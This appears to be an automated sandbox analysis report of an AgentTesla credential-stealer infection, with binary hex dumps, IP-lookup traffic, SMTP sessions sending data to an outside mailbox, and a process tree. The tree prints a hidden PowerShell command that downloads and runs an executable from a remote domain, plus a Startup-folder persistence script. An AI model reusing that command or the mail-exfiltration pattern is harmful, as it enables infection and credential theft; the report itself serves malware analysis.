                                                                      2024-09-27 08:39:12 UTC16384INData Raw: 00 c7 05 a4 64 49 00 a8 83 48 00 89 15 b8 64 49 00 89 15 bc 64 49 00 89 15 c0 64 49 00 c7 05 c8 64 49 00 80 83 48 00 89 15 dc 64 49 00 89 15 e0 64 49 00 89 15 e4 64 49 00 c7 05 ec 64 49 00 70 83 48 00 89 3d fc 64 49 00 89 15 00 65 49 00 c7 05 08 65 49 00 07 00 00 00 c7 05 10 65 49 00 58 83 48 00 89 15 20 65 49 00 89 3d 24 65 49 00 89 0d 28 65 49 00 89 0d 2c 65 49 00 c7 05 34 65 49 00 40 83 48 00 be 42 b0 47 00 89 35 40 65 49 00 be f9 ac 47 00 89 35 64 65 49 00 be 6a a2 47 00 89 35 88 65 49 00 be c3 15 48 00 89 35 ac 65 49 00 be 6a 15 48 00 89 35 d0 65 49 00 be b8 14 48 00 89 35 f4 65 49 00 be 11 15 48 00 89 3d 48 65 49 00 89 3d 6c 65 49 00 89 3d 90 65 49 00 89 3d b4 65 49 00 89 3d d8 65 49 00 89 3d fc 65 49 00 89 3d 1c 66 49 00 5f 89 35 18 66 49 00 5e 89
                                                                      Data Ascii: dIHdIdIdIdIHdIdIdIdIpH=dIeIeIeIXH eI=$eI(eI,eI4eI@HBG5@eIG5deIjG5eIH5eIjH5eIH5eIH=HeI=leI=eI=eI=eI=eI=fI_5fI^
                                                                      2024-09-27 08:39:12 UTC16384INData Raw: 84 4a 00 a3 84 82 4a 00 a3 88 82 4a 00 c7 05 f0 85 4a 00 64 00 00 00 89 0d 6c 84 4a 00 89 0d 8c 82 4a 00 b8 78 81 4a 00 5b 8b e5 5d c3 cc cc cc cc cc 55 8b ec 83 ec 24 53 56 8b f1 57 8b f8 8b 46 08 8b 57 08 8d 0c 40 8d 0c 8a 8b 0c 8d e8 21 49 00 49 83 f9 0a 0f 87 a6 c2 01 00 ff 24 8d 98 cb 40 00 8b ce e8 18 fb ff ff 8b cf 8b f0 e8 0f fb ff ff 3b f0 0f 85 2d c1 01 00 b8 01 00 00 00 5f 5e 5b 8b e5 5d c3 83 fa 04 0f 85 ee c0 01 00 83 7e 08 04 8b 7f 0c 0f 85 f6 c0 01 00 8b 76 0c 8b 4f 04 8b 3f 8b 16 57 52 8b 56 04 33 c0 e8 0f 1c 00 00 85 c0 0f 85 ed c0 01 00 5f 5e b8 01 00 00 00 5b 8b e5 5d c3 8d 49 00 31 cb 40 00 7d 8c 42 00 9f 8c 42 00 55 cb 40 00 d0 8d 42 00 d0 8d 42 00 c1 8c 42 00 0f 8d 42 00 db 8c 42 00 f5 8c 42 00 3f 8d 42 00 cc cc cc cc cc cc cc cc cc
                                                                      Data Ascii: JJJJdlJJxJ[]U$SVWFW@!II$@;-_^[]~vO?WRV3_^[]I1@}BBU@BBBBBB?B
                                                                      2024-09-27 08:39:12 UTC16384INData Raw: 5e 10 89 5e 14 66 89 5e 18 53 89 5e 1a 66 89 5e 1e 6a 5b c7 46 0c 04 00 00 00 ff d7 53 6a 10 88 46 29 ff d7 53 68 a0 00 00 00 88 46 26 ff d7 53 68 a1 00 00 00 88 46 27 ff d7 53 6a 11 88 46 28 ff d7 53 6a 12 88 46 24 ff d7 5f 88 46 25 5b c3 cc cc 33 c9 ba 01 00 00 00 89 08 89 50 08 89 48 0c 88 48 10 89 48 14 88 48 18 89 48 20 89 50 28 89 48 2c 88 48 30 c3 cc cc cc cc cc cc cc cc cc cc cc 8b ce e8 f9 16 ff ff 56 e8 7f 06 00 00 83 c4 04 8b c6 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b f0 57 e8 27 d5 ff ff 8b 47 10 89 46 10 8b 4f 14 89 4e 14 8b 57 18 89 56 18 8b 47 1c 89 46 1c 8b c6 5e c3 cc cc cc cc cc cc cc cc cc cc cc 57 8b f9 c7 07 ac 4e 48 00 e8 22 0e ff ff 8b 47 04 50 e8 25 06 00 00 83 c4 04 5f c3 cc cc cc cc 8b c6 e8 29 1b ff ff 8b 46 04 8b 0e 50
                                                                      Data Ascii: ^^f^S^f^j[FSjF)ShF&ShF'SjF(SjF$_F%[3PHHHHH P(H,H0VVW'GFONWVGF^WNH"GP%_)FP
                                                                      2024-09-27 08:39:12 UTC16384INData Raw: 89 4d f8 89 5d fc 85 ff 74 1a 83 7d 14 00 74 14 85 c9 75 17 e8 90 34 00 00 c7 00 16 00 00 00 e8 33 34 00 00 33 c0 5f 5e 5b c9 c3 8b 75 18 85 f6 74 0c 83 c8 ff 33 d2 f7 f7 39 45 14 76 21 83 fb ff 74 0c 53 6a 00 51 e8 26 e4 ff ff 83 c4 0c 85 f6 74 c1 83 c8 ff 33 d2 f7 f7 39 45 14 77 b5 0f af 7d 14 f7 46 0c 0c 01 00 00 89 7d f0 8b df 74 08 8b 46 18 89 45 f4 eb 07 c7 45 f4 00 10 00 00 85 ff 0f 84 da 00 00 00 f7 46 0c 0c 01 00 00 74 44 8b 46 04 85 c0 74 3d 0f 88 f2 00 00 00 8b fb 3b d8 72 02 8b f8 3b 7d fc 0f 87 bb 00 00 00 57 ff 36 ff 75 fc ff 75 f8 e8 37 95 00 00 29 7e 04 01 3e 01 7d f8 2b df 83 c4 10 29 7d fc 8b 7d f0 e9 85 00 00 00 3b 5d f4 72 5c 83 7d f4 00 74 1f b9 ff ff ff 7f 33 d2 3b d9 76 09 8b c1 f7 75 f4 8b c1 eb 07 8b c3 f7 75 f4 8b c3 2b c2 eb 0b
                                                                      Data Ascii: M]t}tu4343_^[ut39Ev!tSjQ&t39Ew}F}tFEEFtDFt=;r;}W6uu7)~>}+)}};]r\}t3;vuu+
                                                                      2024-09-27 08:39:12 UTC16384INData Raw: 7c dd 83 7d 10 24 7f d7 83 65 fc 00 53 56 6a 08 5b 0f b7 37 53 56 83 c7 02 e8 57 04 00 00 59 59 85 c0 75 ed 66 83 fe 2d 75 06 83 4d 14 02 eb 06 66 83 fe 2b 75 06 0f b7 37 83 c7 02 83 7d 10 00 75 2d 56 e8 a6 77 00 00 59 85 c0 74 09 c7 45 10 0a 00 00 00 eb 3e 0f b7 07 83 f8 78 74 0a 83 f8 58 74 05 89 5d 10 eb 2c c7 45 10 10 00 00 00 83 7d 10 10 75 1f 56 e8 73 77 00 00 59 85 c0 75 14 0f b7 07 83 f8 78 74 05 83 f8 58 75 07 0f b7 77 02 83 c7 04 83 c8 ff 33 d2 f7 75 10 89 55 f8 8b d8 56 e8 47 77 00 00 59 83 f8 ff 75 29 6a 41 58 66 3b c6 77 06 66 83 fe 5a 76 09 8d 46 9f 66 83 f8 19 77 31 8d 46 9f 66 83 f8 19 0f b7 c6 77 03 83 e8 20 83 c0 c9 3b 45 10 73 1a 83 4d 14 08 39 5d fc 72 2a 75 05 3b 45 f8 76 23 83 4d 14 04 83 7d 0c 00 75 25 8b 45 14 83 ef 02 a8 08 75 26
                                                                      Data Ascii: |}$eSVj[7SVWYYuf-uMf+u7}u-VwYtE>xtXt],E}uVswYuxtXuw3uUVGwYu)jAXf;wfZvFfw1Ffw ;EsM9]r*u;Ev#M}u%Eu&
                                                                      2024-09-27 08:39:12 UTC16384INData Raw: 23 c1 74 35 3d 00 04 00 00 74 22 3d 00 08 00 00 74 0c 3b c1 75 29 8b 45 08 83 08 03 eb 21 8b 45 08 8b 08 83 e1 fe 83 c9 02 89 08 eb 12 8b 45 08 8b 08 83 e1 fd 0b cb eb f0 8b 45 08 83 20 fc 8b 06 b9 00 03 00 00 23 c1 74 20 3d 00 02 00 00 74 0c 3b c1 75 22 8b 45 08 83 20 e3 eb 1a 8b 45 08 8b 08 83 e1 e7 83 c9 04 eb 0b 8b 45 08 8b 08 83 e1 eb 83 c9 08 89 08 8b 45 08 8b 4d 14 c1 e1 05 33 08 81 e1 e0 ff 01 00 31 08 8b 45 08 09 58 20 39 7d 20 8b 45 08 8b 7d 1c 74 26 83 60 20 e1 8b 45 18 d9 00 8b 45 08 d9 58 10 8b 45 08 09 58 60 8b 45 08 83 60 60 e1 d9 07 8b 45 08 d9 58 50 eb 34 8b 48 20 83 e1 e3 83 c9 02 89 48 20 8b 45 18 dd 00 8b 45 08 dd 58 10 8b 45 08 09 58 60 8b 45 08 8b 48 60 83 e1 e3 83 c9 02 89 48 60 dd 07 8b 45 08 dd 58 50 e8 d6 04 00 00 8d 45 08 50 53
                                                                      Data Ascii: #t5=t"=t;u)E!EEE #t =t;u"E EEEM31EX 9} E}t&` EEXEX`E``EXP4H H EEXEX`EH`H`EXPEPS
                                                                      2024-09-27 08:39:12 UTC16384INData Raw: d3 e0 6a 03 59 21 06 8b 45 d8 40 3b c1 7d 0a 8d 7c 85 f0 2b c8 33 c0 f3 ab 83 7d dc 00 74 01 43 a1 04 11 49 00 8b c8 2b 0d 08 11 49 00 3b d9 7d 0d 33 c0 8d 7d f0 ab ab ab e9 09 02 00 00 3b d8 0f 8f 0b 02 00 00 2b 45 d4 8d 75 e4 8b c8 8d 7d f0 a5 99 83 e2 1f 03 c2 a5 8b d1 c1 f8 05 81 e2 1f 00 00 80 a5 79 05 4a 83 ca e0 42 83 65 d8 00 83 65 e0 00 83 cf ff 8b ca d3 e7 c7 45 dc 20 00 00 00 29 55 dc f7 d7 8b 5d e0 8d 5c 9d f0 8b 33 8b ce 23 cf 89 4d d4 8b ca d3 ee 8b 4d dc 0b 75 d8 89 33 8b 75 d4 d3 e6 ff 45 e0 83 7d e0 03 89 75 d8 7c d3 8b f0 6a 02 c1 e6 02 8d 4d f8 5a 2b ce 3b d0 7c 08 8b 31 89 74 95 f0 eb 05 83 64 95 f0 00 83 e9 04 4a 79 e9 8b 35 08 11 49 00 4e 8d 46 01 99 83 e2 1f 03 c2 c1 f8 05 8d 56 01 81 e2 1f 00 00 80 89 45 d0 79 05 4a 83 ca e0 42 6a
                                                                      Data Ascii: jY!E@;}|+3}tCI+I;}3};+Eu}yJBeeE )U]\3#MMu3uE}u|jMZ+;|1tdJy5INFVEyJBj
                                                                      2024-09-27 08:39:12 UTC16384INData Raw: 79 32 f7 de 81 e6 ff 00 00 00 7e 28 8b 45 e8 8b 5d e4 8b 4d e4 d1 6d e8 c1 e0 1f d1 eb 0b d8 8b 45 e0 c1 e1 1f d1 e8 0b c1 4e 89 5d e4 89 45 e0 85 f6 7f d8 8d 47 01 8d 5a 04 89 5d c0 89 45 b4 85 c0 0f 8e b5 00 00 00 8b 55 e0 8b 45 e4 8d 75 e0 8d 7d c4 a5 a5 a5 d1 65 e0 8b 7d e0 d1 65 e0 c1 ea 1f 8d 0c 00 0b ca 8b 55 e8 8b f0 c1 ee 1f 03 d2 0b d6 8b c1 8d 34 09 c1 e8 1f 8d 0c 12 8b 55 c4 c1 ef 1f 0b c8 8b 45 e0 0b f7 8d 3c 02 3b f8 72 04 3b fa 73 18 8d 46 01 33 d2 3b c6 72 05 83 f8 01 73 03 33 d2 42 8b f0 85 d2 74 01 41 8b 45 c8 8d 14 30 89 55 bc 3b d6 72 04 3b d0 73 01 41 03 4d cc c1 ea 1f 03 c9 0b ca 8d 34 3f 89 75 e0 8b 75 bc 89 4d e8 c1 e9 18 03 f6 80 c1 30 8b c7 c1 e8 1f 0b f0 88 0b 43 ff 4d b4 83 7d b4 00 89 75 e4 c6 45 eb 00 0f 8f 4b ff ff ff 8a 43
                                                                      Data Ascii: y2~(E]MmEN]EGZ]EUEu}e}eU4UE<;r;sF3;rs3BtAE0U;r;sAM4?uuM0CM}uEKC


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.661253172.67.74.1524434412C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-09-27 08:39:29 UTC155OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                      Host: api.ipify.org
                                                                      Connection: Keep-Alive
                                                                      2024-09-27 08:39:29 UTC211INHTTP/1.1 200 OK
                                                                      Date: Fri, 27 Sep 2024 08:39:29 GMT
                                                                      Content-Type: text/plain
                                                                      Content-Length: 11
                                                                      Connection: close
                                                                      Vary: Origin
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Server: cloudflare
                                                                      CF-RAY: 8c9a2ef98a1442d5-EWR
                                                                      2024-09-27 08:39:29 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                      Data Ascii: 8.46.123.33


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.660910104.26.13.2054435768C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-09-27 08:39:46 UTC155OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                      Host: api.ipify.org
                                                                      Connection: Keep-Alive
                                                                      2024-09-27 08:39:46 UTC211INHTTP/1.1 200 OK
                                                                      Date: Fri, 27 Sep 2024 08:39:46 GMT
                                                                      Content-Type: text/plain
                                                                      Content-Length: 11
                                                                      Connection: close
                                                                      Vary: Origin
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Server: cloudflare
                                                                      CF-RAY: 8c9a2f62892443cd-EWR
                                                                      2024-09-27 08:39:46 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                      Data Ascii: 8.46.123.33


                                                                      SMTP Packets

                                                                      TimestampSource PortDest PortSource IPDest IPCommands
                                                                      Sep 27, 2024 10:39:31.863718033 CEST58761255208.91.198.176192.168.2.6220 PLESK-WEB15.webhostbox.net ESMTP MailEnable Service, Version: 10.43-10.43- ready at 09/27/24 08:39:31
                                                                      Sep 27, 2024 10:39:31.869550943 CEST61255587192.168.2.6208.91.198.176EHLO 855271
                                                                      Sep 27, 2024 10:39:32.028579950 CEST58761255208.91.198.176192.168.2.6250-PLESK-WEB15.webhostbox.net [8.46.123.33], this server offers 5 extensions
                                                                      250-AUTH NTLM CRAM-MD5 LOGIN
                                                                      250-SIZE 31457280
                                                                      250-HELP
                                                                      250-AUTH=LOGIN
                                                                      250 STARTTLS
                                                                      Sep 27, 2024 10:39:32.049669981 CEST61255587192.168.2.6208.91.198.176AUTH ntlm TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAKAGFKAAAADw==
                                                                      Sep 27, 2024 10:39:32.205918074 CEST58761255208.91.198.176192.168.2.6334 TlRMTVNTUAACAAAAFAAUACAAAAAFAgAAASNFZ4mrze9NAGEAaQBsAEUAbgBhAGIAbABlAA==
                                                                      Sep 27, 2024 10:39:32.371865988 CEST58761255208.91.198.176192.168.2.6535 Invalid Username or Password
                                                                      Sep 27, 2024 10:39:32.372162104 CEST61255587192.168.2.6208.91.198.176AUTH login aW5mb0B0ZWNobmlxdWVxYXRhci5jb20=
                                                                      Sep 27, 2024 10:39:32.529844046 CEST58761255208.91.198.176192.168.2.6334 UGFzc3dvcmQ6
                                                                      Sep 27, 2024 10:39:32.692858934 CEST58761255208.91.198.176192.168.2.6235 Authenticated
                                                                      Sep 27, 2024 10:39:32.693131924 CEST61255587192.168.2.6208.91.198.176MAIL FROM:<info@techniqueqatar.com>
                                                                      Sep 27, 2024 10:39:32.853941917 CEST58761255208.91.198.176192.168.2.6250 Requested mail action okay, completed
                                                                      Sep 27, 2024 10:39:32.854136944 CEST61255587192.168.2.6208.91.198.176RCPT TO:<obamueze20@yandex.com>
                                                                      Sep 27, 2024 10:39:33.014722109 CEST58761255208.91.198.176192.168.2.6250 Requested mail action okay, completed
                                                                      Sep 27, 2024 10:39:33.014929056 CEST61255587192.168.2.6208.91.198.176DATA
                                                                      Sep 27, 2024 10:39:33.191643000 CEST58761255208.91.198.176192.168.2.6354 Start mail input; end with <CRLF>.<CRLF>
                                                                      Sep 27, 2024 10:39:33.192322016 CEST61255587192.168.2.6208.91.198.176.
                                                                      Sep 27, 2024 10:39:33.468732119 CEST58761255208.91.198.176192.168.2.6250 Requested mail action okay, completed
                                                                      Sep 27, 2024 10:39:33.527435064 CEST61255587192.168.2.6208.91.198.176QUIT
                                                                      Sep 27, 2024 10:39:33.684020042 CEST58761255208.91.198.176192.168.2.6221 Service closing transmission channel
                                                                      Sep 27, 2024 10:39:34.285824060 CEST58760905208.91.198.176192.168.2.6220 PLESK-WEB15.webhostbox.net ESMTP MailEnable Service, Version: 10.43-10.43- ready at 09/27/24 08:39:34
                                                                      Sep 27, 2024 10:39:34.288938999 CEST60905587192.168.2.6208.91.198.176EHLO 855271
                                                                      Sep 27, 2024 10:39:34.448801994 CEST58760905208.91.198.176192.168.2.6250-PLESK-WEB15.webhostbox.net [8.46.123.33], this server offers 5 extensions
                                                                      250-AUTH NTLM CRAM-MD5 LOGIN
                                                                      250-SIZE 31457280
                                                                      250-HELP
                                                                      250-AUTH=LOGIN
                                                                      250 STARTTLS
                                                                      Sep 27, 2024 10:39:34.480710030 CEST60905587192.168.2.6208.91.198.176AUTH ntlm TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAKAGFKAAAADw==
                                                                      Sep 27, 2024 10:39:34.639841080 CEST58760905208.91.198.176192.168.2.6334 TlRMTVNTUAACAAAAFAAUACAAAAAFAgAAASNFZ4mrze9NAGEAaQBsAEUAbgBhAGIAbABlAA==
                                                                      Sep 27, 2024 10:39:34.815177917 CEST58760905208.91.198.176192.168.2.6535 Invalid Username or Password
                                                                      Sep 27, 2024 10:39:34.815320969 CEST60905587192.168.2.6208.91.198.176AUTH login aW5mb0B0ZWNobmlxdWVxYXRhci5jb20=
                                                                      Sep 27, 2024 10:39:34.976739883 CEST58760905208.91.198.176192.168.2.6334 UGFzc3dvcmQ6
                                                                      Sep 27, 2024 10:39:35.136542082 CEST58760905208.91.198.176192.168.2.6235 Authenticated
                                                                      Sep 27, 2024 10:39:35.136774063 CEST60905587192.168.2.6208.91.198.176MAIL FROM:<info@techniqueqatar.com>
                                                                      Sep 27, 2024 10:39:35.297631025 CEST58760905208.91.198.176192.168.2.6250 Requested mail action okay, completed
                                                                      Sep 27, 2024 10:39:35.297821045 CEST60905587192.168.2.6208.91.198.176RCPT TO:<obamueze20@yandex.com>
                                                                      Sep 27, 2024 10:39:35.460177898 CEST58760905208.91.198.176192.168.2.6250 Requested mail action okay, completed
                                                                      Sep 27, 2024 10:39:35.460342884 CEST60905587192.168.2.6208.91.198.176DATA
                                                                      Sep 27, 2024 10:39:35.638395071 CEST58760905208.91.198.176192.168.2.6354 Start mail input; end with <CRLF>.<CRLF>
                                                                      Sep 27, 2024 10:39:35.640088081 CEST60905587192.168.2.6208.91.198.176.
                                                                      Sep 27, 2024 10:39:36.055511951 CEST58760905208.91.198.176192.168.2.6250 Requested mail action okay, completed
                                                                      Sep 27, 2024 10:39:48.495675087 CEST58760912208.91.198.176192.168.2.6220 PLESK-WEB15.webhostbox.net ESMTP MailEnable Service, Version: 10.43-10.43- ready at 09/27/24 08:39:48
                                                                      Sep 27, 2024 10:39:48.495978117 CEST60912587192.168.2.6208.91.198.176EHLO 855271
                                                                      Sep 27, 2024 10:39:48.656013012 CEST58760912208.91.198.176192.168.2.6250-PLESK-WEB15.webhostbox.net [8.46.123.33], this server offers 5 extensions
                                                                      250-AUTH NTLM CRAM-MD5 LOGIN
                                                                      250-SIZE 31457280
                                                                      250-HELP
                                                                      250-AUTH=LOGIN
                                                                      250 STARTTLS
                                                                      Sep 27, 2024 10:39:48.659544945 CEST60912587192.168.2.6208.91.198.176AUTH ntlm TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAKAGFKAAAADw==
                                                                      Sep 27, 2024 10:39:48.820480108 CEST58760912208.91.198.176192.168.2.6334 TlRMTVNTUAACAAAAFAAUACAAAAAFAgAAASNFZ4mrze9NAGEAaQBsAEUAbgBhAGIAbABlAA==
                                                                      Sep 27, 2024 10:39:48.983197927 CEST58760912208.91.198.176192.168.2.6535 Invalid Username or Password
                                                                      Sep 27, 2024 10:39:48.983772993 CEST60912587192.168.2.6208.91.198.176AUTH login aW5mb0B0ZWNobmlxdWVxYXRhci5jb20=
                                                                      Sep 27, 2024 10:39:49.212616920 CEST58760912208.91.198.176192.168.2.6334 UGFzc3dvcmQ6
                                                                      Sep 27, 2024 10:39:49.374878883 CEST58760912208.91.198.176192.168.2.6235 Authenticated
                                                                      Sep 27, 2024 10:39:49.375241995 CEST60912587192.168.2.6208.91.198.176MAIL FROM:<info@techniqueqatar.com>
                                                                      Sep 27, 2024 10:39:49.537868023 CEST58760912208.91.198.176192.168.2.6250 Requested mail action okay, completed
                                                                      Sep 27, 2024 10:39:49.538279057 CEST60912587192.168.2.6208.91.198.176RCPT TO:<obamueze20@yandex.com>
                                                                      Sep 27, 2024 10:39:49.868890047 CEST58760912208.91.198.176192.168.2.6250 Requested mail action okay, completed
                                                                      Sep 27, 2024 10:39:49.869097948 CEST60912587192.168.2.6208.91.198.176DATA
                                                                      Sep 27, 2024 10:39:50.049453020 CEST58760912208.91.198.176192.168.2.6354 Start mail input; end with <CRLF>.<CRLF>
                                                                      Sep 27, 2024 10:39:50.050106049 CEST60912587192.168.2.6208.91.198.176.
                                                                      Sep 27, 2024 10:39:50.316258907 CEST58760912208.91.198.176192.168.2.6250 Requested mail action okay, completed
                                                                      Sep 27, 2024 10:39:50.353040934 CEST60912587192.168.2.6208.91.198.176QUIT
                                                                      Sep 27, 2024 10:39:50.514698029 CEST58760912208.91.198.176192.168.2.6221 Service closing transmission channel
                                                                      Sep 27, 2024 10:39:51.066147089 CEST58760913208.91.198.176192.168.2.6220 PLESK-WEB15.webhostbox.net ESMTP MailEnable Service, Version: 10.43-10.43- ready at 09/27/24 08:39:50
                                                                      Sep 27, 2024 10:39:51.066314936 CEST60913587192.168.2.6208.91.198.176EHLO 855271
                                                                      Sep 27, 2024 10:39:51.221191883 CEST58760913208.91.198.176192.168.2.6250-PLESK-WEB15.webhostbox.net [8.46.123.33], this server offers 5 extensions
                                                                      250-AUTH NTLM CRAM-MD5 LOGIN
                                                                      250-SIZE 31457280
                                                                      250-HELP
                                                                      250-AUTH=LOGIN
                                                                      250 STARTTLS
                                                                      Sep 27, 2024 10:39:51.221904993 CEST60913587192.168.2.6208.91.198.176AUTH ntlm TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAKAGFKAAAADw==
                                                                      Sep 27, 2024 10:39:51.378034115 CEST58760913208.91.198.176192.168.2.6334 TlRMTVNTUAACAAAAFAAUACAAAAAFAgAAASNFZ4mrze9NAGEAaQBsAEUAbgBhAGIAbABlAA==
                                                                      Sep 27, 2024 10:39:51.535609007 CEST58760913208.91.198.176192.168.2.6535 Invalid Username or Password
                                                                      Sep 27, 2024 10:39:51.535824060 CEST60913587192.168.2.6208.91.198.176AUTH login aW5mb0B0ZWNobmlxdWVxYXRhci5jb20=
                                                                      Sep 27, 2024 10:39:51.690300941 CEST58760913208.91.198.176192.168.2.6334 UGFzc3dvcmQ6
                                                                      Sep 27, 2024 10:39:51.846152067 CEST58760913208.91.198.176192.168.2.6235 Authenticated
                                                                      Sep 27, 2024 10:39:51.851798058 CEST60913587192.168.2.6208.91.198.176MAIL FROM:<info@techniqueqatar.com>
                                                                      Sep 27, 2024 10:39:52.008380890 CEST58760913208.91.198.176192.168.2.6250 Requested mail action okay, completed
                                                                      Sep 27, 2024 10:39:52.008574009 CEST60913587192.168.2.6208.91.198.176RCPT TO:<obamueze20@yandex.com>
                                                                      Sep 27, 2024 10:39:52.164768934 CEST58760913208.91.198.176192.168.2.6250 Requested mail action okay, completed
                                                                      Sep 27, 2024 10:39:52.165067911 CEST60913587192.168.2.6208.91.198.176DATA
                                                                      Sep 27, 2024 10:39:52.337244987 CEST58760913208.91.198.176192.168.2.6354 Start mail input; end with <CRLF>.<CRLF>
                                                                      Sep 27, 2024 10:39:52.339463949 CEST60913587192.168.2.6208.91.198.176.
                                                                      Sep 27, 2024 10:39:52.499825954 CEST58760913208.91.198.176192.168.2.6250 Requested mail action okay, completed

                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Target ID:0
                                                                      Start time:04:38:58
                                                                      Start date:27/09/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oootorgline.ru/components/grace.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }"
                                                                      Imagebase:0x7ff6e3d50000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:2
                                                                      Start time:04:38:59
                                                                      Start date:27/09/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff66e660000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:3
                                                                      Start time:04:39:14
                                                                      Start date:27/09/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\file.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\file.exe"
                                                                      Imagebase:0x400000
                                                                      File size:1'305'263 bytes
                                                                      MD5 hash:AA6F514A7AFA81E26BCF612923EA483C
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:7
                                                                      Start time:04:39:21
                                                                      Start date:27/09/2024
                                                                      Path:C:\Users\user\AppData\Local\unspattered\recomplaint.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\file.exe"
                                                                      Imagebase:0x400000
                                                                      File size:1'305'263 bytes
                                                                      MD5 hash:AA6F514A7AFA81E26BCF612923EA483C
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:8
                                                                      Start time:04:39:26
                                                                      Start date:27/09/2024
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\file.exe"
                                                                      Imagebase:0xea0000
                                                                      File size:45'984 bytes
                                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2557012499.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2557012499.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2567429663.0000000003414000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2567429663.0000000003414000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2567429663.0000000003446000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2567429663.000000000343E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:10
                                                                      Start time:04:39:37
                                                                      Start date:27/09/2024
                                                                      Path:C:\Windows\System32\wscript.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\recomplaint.vbs"
                                                                      Imagebase:0x7ff6d0a00000
                                                                      File size:170'496 bytes
                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:11
                                                                      Start time:04:39:37
                                                                      Start date:27/09/2024
                                                                      Path:C:\Users\user\AppData\Local\unspattered\recomplaint.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Local\unspattered\recomplaint.exe"
                                                                      Imagebase:0x400000
